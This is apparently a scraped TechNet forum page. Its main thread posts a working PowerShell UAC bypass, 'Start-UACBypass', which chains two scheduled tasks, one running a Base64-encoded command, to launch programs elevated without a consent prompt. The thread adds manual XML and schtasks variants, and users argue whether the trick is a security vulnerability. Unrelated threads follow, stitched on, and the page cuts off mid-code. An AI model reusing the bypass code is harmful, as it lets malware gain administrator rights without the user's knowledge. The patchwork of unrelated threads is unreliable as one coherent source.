UAC Bypass
function Start-UACBypass{ [CmdletBinding()] [OutputType()] param( [Parameter(Mandatory,Position=1)] [String]$Execute, [Parameter(Position=2)] [String]$Arguments ) begin{ $TaskXml=@' <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <Triggers> <RegistrationTrigger> <EndBoundary>{0}</EndBoundary> </RegistrationTrigger> </Triggers> <Principals> <Principal> <UserId>{1}</UserId> <RunLevel>{2}</RunLevel> <LogonType>{3}</LogonType> </Principal> </Principals> <Settings> <WakeToRun>false</WakeToRun> <StartWhenAvailable>false</StartWhenAvailable> <AllowStartOnDemand>false</AllowStartOnDemand> <AllowHardTerminate>true</AllowHardTerminate> <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> <RunOnlyIfIdle>false</RunOnlyIfIdle> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> <ExecutionTimeLimit>P0D</ExecutionTimeLimit> <Priority>5</Priority> <DeleteExpiredTaskAfter>P0D</DeleteExpiredTaskAfter> </Settings> <Actions> <Exec> <Command>{4}</Command> <Arguments>{5}</Arguments> </Exec> </Actions> </Task> '@ $TaskService=New-Object -ComObject Schedule.Service $TaskService.Connect() $EndBoundary=[Xml.XmlConvert]::ToString((Get-Date).AddMinutes(1),[Xml.XmlDateTimeSerializationMode]::RoundtripKind) $UserId=[Security.SecurityElement]::Escape($TaskService.ConnectedUser) $SecondTask=$TaskXml-f$EndBoundary,$UserId,'HighestAvailable','InteractiveToken',[Security.SecurityElement]::Escape($Execute),[Security.SecurityElement]::Escape($Arguments) $Command='$TaskService=New-Object -ComObject Schedule.Service;$TaskService.Connect();$TaskService.GetFolder($null).RegisterTask($null,''{0}'',2,$null,$null,0)'-f($SecondTask-replace'''','''''') $FirstTask=$TaskXml-f$EndBoundary,$UserId,'LeastPrivilege','S4U','PowerShell',('-NoProfile -NonInteractive -EncodedCommand {0}'-f[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Command))) $TaskService.GetFolder($null).RegisterTask($null,$FirstTask,2,$null,$null,0)|Out-Null } } Usage: Start-UACBypass cmd '/k title Hello World'
Reply:
Hi
Do you need help with this?
Hope this helps. Please remember to click "Mark as Answer" on the post that helps you, and to click "Unmark as Answer" if a marked post does not actually answer your question. This can be beneficial to other community members reading the thread.
------------------------------------
Reply:
------------------------------------
Reply:
Hi PetSerAl,
As the issue is specific with a Powershell skill , you may contact Microsoft for further assistance on this from PowerShell forum:
http://social.technet.microsoft.com/Forums/windowsserver/en-US/home?forum=winserverpowershell
Please revert for any clarification on this or any Windows issue. We will be glad to help you about this.
Regards
Wade Liu
TechNet Community Support
------------------------------------
Reply:
------------------------------------
Reply:
Hi PetSerAl,
In this case, can you give some more background information about this? Besides, I want to know how the COM API is called in the PowerShell command in your post, because I am not a professional developer.
Regards
Wade Liu
TechNet Community Support
------------------------------------
Reply:
First.xml:
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <Triggers> <RegistrationTrigger> <EndBoundary>{1}</EndBoundary> </RegistrationTrigger> </Triggers> <Principals> <Principal> <UserId>{2}</UserId> <RunLevel>LeastPrivilege</RunLevel> <LogonType>S4U</LogonType> </Principal> </Principals> <Settings> <WakeToRun>false</WakeToRun> <StartWhenAvailable>false</StartWhenAvailable> <AllowStartOnDemand>false</AllowStartOnDemand> <AllowHardTerminate>true</AllowHardTerminate> <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> <RunOnlyIfIdle>false</RunOnlyIfIdle> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> <ExecutionTimeLimit>P0D</ExecutionTimeLimit> <Priority>5</Priority> <DeleteExpiredTaskAfter>P0D</DeleteExpiredTaskAfter> </Settings> <Actions> <Exec> <Command>schtasks</Command> <Arguments>/create /tn "" /xml "{3}\Second.xml"</Arguments> </Exec> </Actions> </Task> Second.xml: <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <Triggers> <RegistrationTrigger> <EndBoundary>{1}</EndBoundary> </RegistrationTrigger> </Triggers> <Principals> <Principal> <UserId>{2}</UserId> <RunLevel>HighestAvailable</RunLevel> <LogonType>InteractiveToken</LogonType> </Principal> </Principals> <Settings> <WakeToRun>false</WakeToRun> <StartWhenAvailable>false</StartWhenAvailable> <AllowStartOnDemand>false</AllowStartOnDemand> <AllowHardTerminate>true</AllowHardTerminate> <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> <RunOnlyIfIdle>false</RunOnlyIfIdle> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> <ExecutionTimeLimit>P0D</ExecutionTimeLimit> <Priority>5</Priority> <DeleteExpiredTaskAfter>P0D</DeleteExpiredTaskAfter> </Settings> <Actions> <Exec> <Command>cmd</Command> <Arguments>/k title Hello World</Arguments> </Exec> </Actions> </Task> Where {1} should be replaced by some point in future (at this point task will be automatically removed). For example 2014-09-07T00:00:00. {2} should be replaced by user name. {3} should be replaced by path to Second.xml file. And you can start it all by this command: schtasks /create /tn "" /xml First.xml
------------------------------------
Reply:
Hi PetSerAl,
Since COM API is a system component, I suggest to run the system file checker command to fix this. System File Checker is a utility in Windows that allows users to scan for corruptions in Windows system files and restore corrupted files.
You can follow it in the way below:
http://support.microsoft.com/kb/929833
Besides, try to disable powershell and enable powershell from the control panel to check the result.
Regards
Wade Liu
TechNet Community Support
------------------------------------
Reply:
Dear Wade Liu,
PetSerAl has demonstrated how to bypass UAC. This shows, that administrators can't keep scripts that they themselves accidentally start (or that they are tricked into starting) from elevating, setting free the full admin power. This even works if UAC is set to "always notify", by the way. You however recommend to use system file checker? You also recommend to reinstall powershell? What are you talking about, Wade Liu?
------------------------------------
Reply:
------------------------------------
Reply:
Hi Ronald,
I am trying to provided suggestion that relates to the system itself to fix corrupted system file if necessary, besides, I also suggest to post it at the powershell forum for further discussion.
Regards
Wade Liu
TechNet Community Support
------------------------------------
Reply:
Hi.
No need to repeat it, you already wrote that. My question was "what are you talking about?" simply, because there is no connection to this thread. Have you understood what this is about? You can easily see for yourself by executing that powershell script. You can see that the contents are harmless but it shows how serious (in terms of security) this bug is.
- Edited by Ronald Schilf Thursday, September 11, 2014 9:28 AM
------------------------------------
Reply:
------------------------------------
Reply:
PetSerAl, any news? Did you find any hint on why this works for win8.1 and not for win7 or win10?
Any reaction from Microsoft?
------------------------------------
Reply:
function Start-UACBypass{ [CmdletBinding()] [OutputType()] param( [Parameter(Mandatory,Position=1)] [String]$Execute, [Parameter(Position=2)] [String]$Arguments ) begin{ $TaskXml=@' <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <Triggers> <RegistrationTrigger> <EndBoundary>{0}</EndBoundary> </RegistrationTrigger> </Triggers> <Principals> <Principal> <UserId>{1}</UserId> <RunLevel>{2}</RunLevel> <LogonType>{3}</LogonType> </Principal> </Principals> <Settings> <WakeToRun>false</WakeToRun> <StartWhenAvailable>false</StartWhenAvailable> <AllowStartOnDemand>false</AllowStartOnDemand> <AllowHardTerminate>true</AllowHardTerminate> <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> <RunOnlyIfIdle>false</RunOnlyIfIdle> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> <ExecutionTimeLimit>P0D</ExecutionTimeLimit> <Priority>5</Priority> <DeleteExpiredTaskAfter>P0D</DeleteExpiredTaskAfter> </Settings> <Actions> <Exec> <Command>{4}</Command> <Arguments>{5}</Arguments> </Exec> </Actions> </Task> '@ $TaskService=New-Object -ComObject Schedule.Service $TaskService.Connect() $EndBoundary=[Xml.XmlConvert]::ToString((Get-Date).AddMinutes(1),[Xml.XmlDateTimeSerializationMode]::RoundtripKind) $UserId=[Security.SecurityElement]::Escape($TaskService.ConnectedUser) $SecondTask=$TaskXml-f$EndBoundary,$UserId,'HighestAvailable','InteractiveToken',[Security.SecurityElement]::Escape($Execute),[Security.SecurityElement]::Escape($Arguments) $Command='$TaskService=New-Object -ComObject Schedule.Service;$TaskService.Connect();$TaskService.GetFolder($null).RegisterTask([guid]::NewGuid().ToString(),''{0}'',2,$null,$null,0)'-f($SecondTask-replace'''','''''') $FirstTask=$TaskXml-f$EndBoundary,$UserId,'LeastPrivilege','S4U','PowerShell',('-NoProfile -NonInteractive -EncodedCommand {0}'-f[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Command))) $TaskService.GetFolder($null).RegisterTask([guid]::NewGuid().ToString(),$FirstTask,2,$null,$null,0)|Out-Null } } I am not checked my script (original or edited) for Vista or Seven, so I can not even say work it or not. But if them share same misbehavior of task scheduler it should work.No one from Microsoft contact me.
------------------------------------
Reply:
Correct me if I'm wrong, you are just showing that you can run things elevated from the Task Scheduler, right? And that you can schedule something from a privileged account via XML to run escalated without a UAC prompt?
Windows was never designed to protect itself from its user. In fact, just the opposite. At the core of the design is the concept that the greatest value is derived from modifying the system. It's only gradually been migrating away from that, sometimes more sometimes less successfully.
Going back to prehistory, the OS architecture NT was copied from was extremely secure, but Microsoft just didn't take everything it offered, choosing instead to implement many shortcuts. My brain cells aren't what they used to be, but I don't remember any "automatic privilege de-escalation" in VMS. An administrator was an administrator, and you had the full power of the system. And there was certainly not anything like "file system virtualization" or "registry virtualization". Those things are just ridiculous hacks.
And Ronald... If you goad Microsoft into trying to "fix" this "security hole", they'll likely break something fundamental and it will be even harder to get work done. Maybe you should just rest easy in the knowledge that this could be a valuable tool if you should need it. I suggest never assuming you can rely on UAC for anything, and disassociate UAC in your mind from security entirely. False security is worse than no security.
-Noel
| Detailed how-to in my eBooks: | Configure The Windows 7 "To Work" Options |
------------------------------------
Reply:
<RunLevel>LeastPrivilege</RunLevel> <LogonType>S4U</LogonType>actually run as if it was
<RunLevel>HighestAvailable</RunLevel>but limited user can not just register task with
<RunLevel>HighestAvailable</RunLevel>it will get access denied error. It is definitely a bug and should be fixed.
------------------------------------
Reply:
------------------------------------
Reply:
------------------------------------
Reply:
Hi Noel.
UAC has many use cases, which originate in mitigating compatibility problems when running as restricted user, but it has so many positive effects on security, it would be ridiculous not to call it security associated.The secure desktop alone is worth a lot. And for example having the option to re-authenticate (being prompted for a password again) when fulfilling administrative tasks is required in order to be certified for some military-class IT standards here in Germany - only possible with UAC. With software aware of this design flaw, the UAC is bypassed, any process started by an administrative user will be elevated without the knowledge of the admin.
So for those who run as restricted user and use another account for administrative work, this flaw has no consequences. But for those who use UAC like it was designed for, this should be fixed.
"you are just showing that you can run things elevated from the Task Scheduler, right" - no, for a better understanding, use Powershell ISE (not elevated), paste that code and run it. You will see that UAC is bypassed unlike with task scheduler, where UAC is only bypassed AFTER having started task scheduler elevated and created a task with high privilege option, that's the big difference and that makes it exploitable. Malware will love it.
- Edited by Ronald Schilf Monday, December 22, 2014 11:38 AM
------------------------------------
Reply:
Hi.
"it did not pass Definition of a Security Vulnerability" - I wonder why it doesn't. To me, it clearly does. We have an admin in admin approval mode - without elevating, he will get access denials, he will not be able to access certain items protected by ACLs. Of course it is in the interest of the admin himself not to be able to access those without elevating, so that he will be aware when this happens and may approve that action.
To follow microsoft's browser example on the definition site: ssl may not use plain text. And here, admins in UAC admin approval mode may not get the same results as if approval mode was off.
- Edited by Ronald Schilf Monday, December 22, 2014 2:14 PM
------------------------------------
Reply:
If the problem meets the definition of a vulnerability, the next question is whether it violates the product's security boundaries. Every product has a set of assumptions about how it will be used, and a set of promises it makes about the security provided when it's used properly. For instance, User Access Control (UAC) is a technology introduced with Windows Vista that provides a method of separating standard user privileges and tasks from those that require Administrator access. If a Standard User is using the system and attempts to perform an action for which the user has no authorization, a prompt from Windows appears and asks the Administrator account's password. If an Administrator is using the system and attempts to do the same task, there is only a warning prompt. That prompt is known as a "Consent Prompt" because the administrator is only asked to agree to the action before proceeding. A weakness that would allow to bypass the "Consent Prompt" is not considered a security vulnerability, since that is not considered a security boundary.
------------------------------------
Reply:
Thanks for your attempt at an explanation, but I know more about UAC than you may think, Ronald.
Do not rely on it. It was not "designed" so much as "shoehorned in" to a system that never expected it and doesn't believe in it. It's a poor implementation of a bad idea.
If you want true user security, create a non-privileged user account, and set permissions so that what's needed to be accessed can be accessed. If you want to be an administrator, be an administrator. Trying to straddle the line and second guess what the user needs is just silly, especially if you aren't allowed to turn it off.
-Noel
| Detailed how-to in my eBooks: | Configure The Windows 7 "To Work" Options |
------------------------------------
Reply:
PetSerAl, the key is that you're a member of the Administrators group and of course you're allowed to schedule a task using your user ID. I fail to see a problem here.
If you're expecting UAC to protect you from anything you're not doing what you need to be doing to protect yourself. It's not a water tight security measure. It's more like a wetsuit.
Inviting malware into your computer then at the last possible instant trying to prevent it from doing its business all over your system isn't a viable security strategy at all. If you're doing the right things, you should never, ever, see a UAC prompt you don't expect - thus rendering it completely useless.
"The right things" vary, depending on usage, but at a minimum you ought to block access to sites known to send malware, deconfigure the promiscuity of the web browser to load and run anything it comes across, and (most of all) educate users to have them practice good computing habits. These include teaching people not to run everything in sight but to thoroughly vet software before running it. Mistrust everything!
Security is a human problem, not a technical one. UAC leads to a FALSE sense of security, which is MUCH WORSE than if it didn't exist at all.
And don't tell me you think malware is less a problem now than before Vista.
-Noel
| Detailed how-to in my eBooks: | Configure The Windows 7 "To Work" Options |
------------------------------------
Reply:
The key it that parameter RunLevel=LeastPrivilege is ignored. So it ether the bug, then it should be fixed, ether feature, then it should be documented.
- Edited by PetSerAl Tuesday, December 23, 2014 1:44 AM
------------------------------------
Reply:
PetSerAl, you are right, their very own definition talks about UAC bypassing not being a sec. vulnerability. Good, I had read through all the definition paragraphs, but haven't expected to find it covered at the beginning. So they would call it a weakness.
Noel, I am on your side with everything you wrote in your last 2 comments. Nevertheless, this is something new and dangerous (to users of admin approval mode, not to users that separate their admin and user account). I have not seen many UAC bypass techniques yet and this one is surely the easiest to implement.
------------------------------------
Reply:
UAC's same-desktop elevation is not a security boundary. It is a convenience feature. From a security perspective, "protected admin" (i.e., member of the Administrators group running not elevated) and "full admin" are equivalent. Windows tries to minimize leaks like this, but there is a lot of shared surface area between the unelevated and elevated "versions" of a single user account. Even same-desktop/different-user elevation is not considered a security boundary because of the shared space in which the elevation takes place. There IS a security boundary between standard user and (admins | other users | OS config). If a standard user can gain admin rights without, for example, tricking an admin into giving up credentials, that's a bug that will be fixed. But if you are running as a member of the admins group and are expecting that any malware you run can never gain admin rights unless you explicitly approve its elevation request, you are mistaken. That has never been the case.
BTW, UAC's file/registry virtualization was disparaged earlier in this thread. File/reg virt is a brilliant idea that enables lots of apps to run with standard user rights that required admin rights on XP and earlier.
For more information, see Mark Russinovich's articles about UAC in TechNet Magazine.
http://technet.microsoft.com/en-us/magazine/2007.06.uac.aspx
http://technet.microsoft.com/en-us/magazine/2009.07.uac.aspx
------------------------------------
Reply:
file/reg virt is a brilliant idea that enables lots of apps to run with standard user rights that required admin rights on XP and earlier.
Our definitions of what's "brilliant" and what's not simply differ.
In my universe when the OS second guesses you and does something different than what you've told it to do, that's considered bad.
I'm also someone who's always been the full-time administrator of my computer systems, with never a downside to that. While I understand the concept of protecting a computer system from its user, it's not something I've ever personally found any use for.
-Noel
| Detailed how-to in my eBooks: | Configure The Windows 7 "To Work" Options |
------------------------------------
Reply:
Aaron, you are a top Microsoft insider and security expert.
I would expect you to answer clearly like: "yes, this is known and expected behavior" to address what initially brought this matter up: what are we seeing here? Is it a known design weakness?
I don't expect the answer to be "it's a known weakness" because if it were, it would already be incorporated into tons of malware and become well-known pretty soon. But this is the first time I read about it and the first UAC bypass I see that is altogether easy.
I hope to see more feedback,
- Edited by Ronald Schilf Sunday, December 28, 2014 8:27 PM
------------------------------------
Reply:
In the universe I spend most of my time in, users care whether the program works the way they expect it to. They don't care what happens behind the scenes. The program needs to save some settings so that they can be retrieved the next time the user runs the program, and it needs to do so without triggering an access-denied error message. File/reg virt takes care this while improving the computer's security by not insisting that you run with admin rights. You can easily disable file/reg virt for your programs just by rebuilding them in VS2008 or newer. You can also obviate the need for it by having your program write data to the correct locations in the first place. If you're writing user data to "Program Files" or HKLM, that's considered bad.
------------------------------------
Reply:
------------------------------------
Reply:
First let me say that I fully understand how things are "supposed to be" and don't write software that abuses the system.
However, you seem to think making things work for non-technical users by corrupting the way the operating system works behind the scenes is okay. It's like making a video driver that's aware of the software that is using it. Or a car that refuses to turn left sometimes even when the user turns the wheel that way. It's a bad idea. I was going to say "in my opinion", but I won't even concede that much. It's so bad an idea that it's self-evident to plankton.
In the "big picture" sense, one of the things that makes software work solidly and reliably is that the APIs it uses do well-defined, well-documented things. Having the OS step in and sometimes choose to put data in places that were not originally intended just makes a mess that if let go gets to the point where things become unusable.
Whose idea was it not to make the various parts of UAC configurable? Why is there no way to deconfigure the UAC virtualization features? Microsoft itself acknowledges that there are conditions where failure should occur (vs. magic that tries to make something work), such as when a 64 bit process tries to write to a place that's virtualized for 32 bit software. Perhaps there are those who'd like to run a tighter ship, and who really WOULD like things to fail if the software is trying to do something not compatible with the current way of thinking.
Let me spell it out for you: Today we're at a point where technology often doesn't work right. It's becoming expected. But it doesn't have to be so, and it's this way precisely because people do things like implement magic deep inside an operating system that causes it to do something different than what was intended.
No, my friend, no part of UAC is by any means even close to "brilliant", unless you use the term to describe the fireball that occurs when the jalopy being used by the local daredevil to jump 18 school buses reaches the end of its flight.
-Noel
| Detailed how-to in my eBooks: | Configure The Windows 7 "To Work" Options |
------------------------------------
Reply:
Well. I infer from your tone that you are not open to persuasion on this topic, but I'll give it a shot anyway.
Re making software work solidly and reliably: on its own, software frequently does not do that in the face of a changing platform, unless the platform makes some concessions. We NEEDED to make non-admin the default, and we did. That exposed a lot of bugs in a lot of programs that ASSUMED that they could put files and registry values anywhere. Failure on future platforms was not something that app developers "originally intended"; the original intent was that the program would continue to work. File/registry virtualization helps ensure that what was originally intended actually happens. If a program written for XP or earlier absolutely had to put something in a system-wide location, it should first have verified that the user had admin rights. If it had done so and displayed an error message if the user wasn't an admin, then the user would know to run the program as administrator. File/reg virtualization is disabled for admin/elevated programs. (BTW, if you really have to, there is a UAC security option that specifically disables file/registry virtualization without changing any other aspects of UAC. I've never seen a need for doing so, though.)
You point out that technology often doesn't work right. Without file/registry virtualization, the percentage of programs that didn't work on Vista and newer would have been VERY high, much higher than it was.
------------------------------------
Reply:
(BTW, if you really have to, there is a UAC security option that specifically disables file/registry virtualization without changing any other aspects of UAC. I've never seen a need for doing so, though.)
Thank you. I need to research that option; I was not aware of it before now. It may help make UAC a bit more tolerable (though frankly we shouldn't have to tolerate it at all). You should consider making the non-virtualization setting the default moving forward and only invoke virtualization upon a compatibility setting being chosen.
You're right, I'm not open to persuasion on my stand on whether UAC is even remotely a good idea. You feel it's justified, but I feel it's screwing up the future. Those appear to be irreconcilable differences.
I was going to write a good bit more, but it might be taken badly, so I'll leave it at that.
-Noel
| Detailed how-to in my eBooks: | Configure The Windows 7 "To Work" Options |
------------------------------------
Reply:
PetSerAl,
some weeks ago I asked Mark Russinovich about this matter. He has replied that
"We've decided to fix this in Windows 10, but have no plans to port the fix to older OS's."
No further comment, so it seems it is well worth fixing, at least in future OS'.
------------------------------------
Reply:
So now it looks like they're going to "fix" this non-issue - and quite probably break something else. Thanks in advance for some unspecified future "can't get there from here" situations with Windows 10+ as a result of it.
By the way, I ran into yet another UAC annoyance on my Win 10 test system, on which I've begrudgingly allowed UAC to remain enabled - for now. I am a beta tester for several applications, and lo and behold the system decided to step in and disallow me from writing the latest drop of one of them into its Program Files subfolder. How wonderful. Thanks bunches for that little distraction and for chewing up just a bit of my time. Not.
You do realize that I will never, ever visit your App Store and spend money there if I configure EnableLUA to 0, right? So far, up to now, that's been EXACTLY my choice - like many others who need serious things out of Windows, I have disabled UAC. But hey, there are plenty of dupes out there who'll put money in your paychecks, right?
-Noel
| Detailed how-to in my eBooks: | Configure The Windows 7 "To Work" Options |
------------------------------------
Reply:
------------------------------------
Reply:
So the day has arrived where people herald new restrictions being placed on their being able to use their computers as a "feature".
Next, deletions of existing features will be considered stylish. Oh wait, that already happened.
;-)
-Noel
| Detailed how-to in my eBooks: | Configure The Windows 7 "To Work" Options |
------------------------------------
Reply:
------------------------------------
Reply:
Aaron, it's possible you somehow think it's all about running Windows.
It's really all about facilitating users' work. These things are not the same.
I've been running Win 10 in a testing environment, giving UAC the ol' college try once again - as I have done with every new OS release since Vista. The number of irritating "can't put the shortcut there, want to put it on the desktop instead?" messages are excessive. The pop-up messages asking for permission to do exactly what I told it to do - even though I dragged the slider all the way to the bottom - are both numerous and ridiculous. I have better things to do than to ask you for permission to do what I want with my computer system.
Now it's on to see how well Win 10 runs with EnableLUA set to 0. So far, after half a day of testing, thankfully rather well. Rest assured with that setting I will *NEVER* visit your store nor run your Metrotard Apps.
-Noel
| Detailed how-to in my eBooks: | Configure The Windows 7 "To Work" Options |
------------------------------------
Is there any on Premise Power BI server available to download or PowerBI is only for the cloud?
Is there any on Premise Power BI server available to download or PowerBI is only for the cloud?
I basically building dashboards in Power BI designer wanted to know if there is any on Premise Power BI server available to download or PowerBI is only for the cloud?
Mudassar
Reply:
Hi Mudassar,
Power BI is only for the cloud at the present time. However, you can vote on this Power BI UserVoice suggestion which asks for the on prem use case to be supported: https://support.powerbi.com/forums/265200-power-bi/suggestions/6867727-use-power-bi-alongside-ssrs-on-prem-sql-server-201.
Regards,
Michael Amadi
Please use the 'Mark as answer' link to mark a post that answers your question. If you find a reply helpful, please remember to vote it as helpful :)
Website: http://www.nimblelearn.com, Twitter: @nimblelearn
- Edited by Michael AmadiModerator Tuesday, May 5, 2015 6:56 AM Updated link to open in new window/tab
------------------------------------
MS has ditched Media Center
Reply:
S.Sengupta, Windows Experience MVP
------------------------------------
Good news. Instead of saying " Tha's our Intent", Gabriel Aul now says " yes...." .......with a twist.
- Changed type david hk129 Monday, May 4, 2015 11:09 PM
- Edited by david hk129 Monday, May 4, 2015 11:13 PM
ii dont know what im doing
I seriously am concerned that my computer and EVERYTHING else is being accessed for another location like another desktop or laptop how can I find out if someone is watching my EVERY move? please help me figure out hoe to find out if I'm being watched/spied on.
Reply:
Hi Bianca_143,
You can scan for, and remove what's known as "rootkits":
https://www.sophos.com/products/free-tools/sophos-anti-rootkit.aspx
What is a rootkit? http://en.wikipedia.org/wiki/Rootkit
Rootkit removal: http://lmgtfy.com/?q=rootkit+removal
Best regards,
Please remember to mark the replies as helpful if they help, or as answers if they answer your question. Please also unmark the answers if they provide no help.
Zach Roberts
Independent Microsoft Community Support Advisor
Disclaimer: I don't work for Microsoft. Any advice given is my own and does not represent Microsoft.
Follow me on Twitter: @WindowsZach
------------------------------------
Reply:
This forum is related to Microsoft System Center Service Manager.
It seems you question is not related to SCSM. You should post your question in an appropriate forum. For instance a Windows 7 or Windows 8 (8.1) forum. For instance http://answers.microsoft.com/en-us/windows
Andreas Baumgarten | H&D International Group
------------------------------------
SQL SQL Server 2016 public preview coming this summer
- Changed type pituachMVP Monday, May 4, 2015 7:01 PM this is an announcement
Reply:
Thanks for the information
* by the way, personally I had already post about this on facebook :-)
I changed the thread type to "General discussion"
 | Ronen Ariely [Personal Site] [Blog] [Facebook] |
------------------------------------
Best SIP trunk providers for Lync in UK
Hi,
Does anyone have any experience with SIP trunk providers in UK? can you suggest one that does not require me to purchase a MPLS line (like BT) or one that requires me to have a SBC on site. I have tried Gamma too but they are extremely slow in any kind of response, any request can take over a month for them to complete.
P.S. please do not send me the link for approved SIP providers, i know about that, I am trying to see if anyone from UK has some good experience with a provider that I can utilize.
Thanks,
- Changed type Eric_YangK Thursday, April 23, 2015 3:10 AM General discussion
Reply:
Alessio Giombini | Microsoft Solutions Architect | Twitter: @AlessioGiombini
Lync 2013 Detailed Design Calculator: try it at http://goo.gl/jU1hZR
------------------------------------
I want to be server support engineer
Hi All,
I want to be server support engineer. What do I have to do? When I apply for jobs for server support they ask for experience in managing servers etc.
If it just require studying /passing MCSA server 2003 then I have it however, I haven't got commercial experience etc. Do you need experience to get to server support as currently I am working 2nd line and I have basic commercial experience on server.
But I have seen people going on server support without experience. is it possible?
Thanks.
- Changed type Vivian_Wang Wednesday, May 6, 2015 2:54 AM
Reply:
mayby you can upgrade your exam to 70-410 70-411 / 70-412.
You have to find a company that will give you a try to learn the rest in practice..
Come back and mark replies as answer if they help, and help others with the same problem. If this post is helpful please vote it as Helpful on the left side.
------------------------------------
Reply:
Thanks for quick response. So you can go to server support after passing exams. What if you don't get any company to give you a chance (as in my case). So do I have to go through 2nd line and get some 3rd line exp before going on 3rd line role?
As I think passing exams don't directly put you on server engineer job role. I needed to know this as I am trying to get to server support role for a long time but all I get is "You don't have server experience commercially" even though I know I can do it.
------------------------------------
Reply:
And if you start as a apllication manager with a possibility to grow into server management?
Come back and mark replies as answer if they help, and help others with the same problem. If this post is helpful please vote it as Helpful on the left side.
------------------------------------
Reply:
And if you start as a apllication manager with a possibility to grow into server management?
Come back and mark replies as answer if they help, and help others with the same problem. If this post is helpful please vote it as Helpful on the left side.
Thanks I am looking into going to server admin role as server engineer.
------------------------------------
Web Siteleri ile ilgili Mail Yönetimi
antalyaevdenevetasimafirmalari.com ilgili web sitelerde mail yönetimi nasıl olmalıdır.
- Edited by KaliteliPanelci Monday, May 4, 2015 12:53 PM
SharePoint Online; Is it possible to start a local application from withing a sharepoint online site?
Hi
We have a SharePoint site that is called "Programs". On this site we have added links to our webprograms.
How can we add links to local applications that run on our local server?
brgs
Bjorn
- Changed type Bjørn Roalkvam Wednesday, June 10, 2015 8:21 AM
Reply:
cameron rautmann
------------------------------------
Reply:
Hi Cameron,
They are on a shared network drive, meaning the shortcut to the local applications are the same for all users.
brgs
Bjorn
------------------------------------
Reply:
So you're just looking for the link format to use? If so:
Drive://address/folder/file.ext
cameron rautmann
------------------------------------
Reply:
Hi Cameron,
Links must start with:https://, mailto:, news:, ftp://, file:// or \\
I add the link:
file://c:/windows/system32/notepad.exe
and it does not work.
I also tried to add code:
<a href="file:///c:\windows\system32\notepad.exe">Link</a>
I had a look on Microsoft URLs
I cant seem to get this working. Are anyone able to start notepad using a link from SharePoint online?
brgs
Bjorn
- Edited by Bjørn Roalkvam Thursday, April 30, 2015 7:16 AM
------------------------------------
Reply:
cameron rautmann
------------------------------------
Reply:
I see.
In my googling-travels Ive found ActiveX Launch javascript to start application.
Im trying to see if u can use this.
brgs
Bjorn
------------------------------------
Reply:
Couple things- first, why are you trying to do this?
Second, beware of the security issue brought up in that link. If you're doing it on an intranet, at first it seems OK, but will you be able to prevent users from changing their internet settings to allow "Initialize and script ActiveX controls not marked as safe for scripting?" That could be a major security risk if they do.
cameron rautmann
------------------------------------
Reply:
Im trying to start notepad locally.
I know about the security issues.
------------------------------------
How to set the restriction Domain users can't save data on desktop by GPO on server 2003
Pankaj Kumar
How to set the restriction Domain users can't save data on desktop by GPO on server 2003
Pankaj Kumar
Error and Transaction Handling in SQL Server
I am glad to announce that I have completed a series of three articles and three appendixes about error and transaction handling in SQL Server.
The first part is a short jumpstart, slightly longer than the version that used to be there. Part Two discusses commands for error handling in detail, and also describes all the possible actions SQL Server can take in case of an error. Part Three focuses on how to implement error handling, and has extensive examples and it also presents a facility to log and raise errors.
The three appendixes cover linked servers, the CLR and Service Broker respectively.
You find Part One on http://www.sommarskog.se/error_handling/Part1.html and it includes links to all other parts. (And you should start your reading with Part One.)
Erland Sommarskog, SQL Server MVP, esquel@sommarskog.se
- Changed type Erland SommarskogMVP Sunday, May 3, 2015 9:46 PM
- Edited by Erland SommarskogMVP Sunday, May 3, 2015 9:47 PM cleanup
Reply:
Kalman Toth Database & OLAP Architect SQL Server 2014 Database Design
New Book / Kindle: Beginner Database Design & SQL Programming Using Microsoft SQL Server 2014
------------------------------------
Reply:
------------------------------------
Reply:
Hey Erland ! Service Broker is one area where not many implementations are done and therefore lack of real-world use cases. Great to know that you are talking about it extensively now ! Can't resist to have a look at it
Thanks !
Good Luck!
Please Mark This As Answer if it solved your issue.
Please Vote This As Helpful if it helps to solve your issue
------------------------------------
Reply:
------------------------------------
Reply:
Hey Erland ! Service Broker is one area where not many implementations are done and therefore lack of real-world use cases. Great to know that you are talking about it extensively now ! Can't resist to have a look at it
I would say that there is quite some usage of Service Broker out there, but at the same time I agree that it is an under-used feature. We use Service Broker in the system I mainly occupy myself with, but I have have not worked extensively with it, so I will have to admit that I'm little out on the ledge in that appendix. But I wanted to write something which is better than SAVE TRANSACTION which often is suggested - and which is not likely to work well.
Erland Sommarskog, SQL Server MVP, esquel@sommarskog.se
------------------------------------
Publishing HTML(Page content) field required field validation is not working
The required field validation is not working on Site Column of type "Full HTML content with formatting and constraints for publishing". I found a link i.e.
https://social.msdn.microsoft.com/Forums/office/en-US/7b544aae-2562-4b8e-8e5b-36a1d47a4d14/publishing-htmlpage-content-field-required-field-validation-is-not-working?forum=sharepointdevelopment
which tells this is a hot fix in July 2014 CU . Can anyone help me with what all Fixes are there in July 2014 CU. So that I can update only if it required!
Or any other alternative where I can use the required field validator on "Full HTML content with formatting and constraints for publishing" column type?
- Changed type Alpesh260490 Monday, May 4, 2015 8:27 AM
Reply:
You could add a scripteditor webpart on the newform.aspx page and add client side validation using jQuery.
$(document).ready(function(){
var fname = document.getElementById('fname').val();
var lname = document.getElementById('lname').val();
var age = document.getElementById('age').val();
/*Do not know how to get element by class and that too, two different type. Have to check if user chose anything or not*/
$("#submit").click(function()
{
if(fname.length === 0)
{
alert("Please input a first name");
}
else if(lname.length === 0)
{
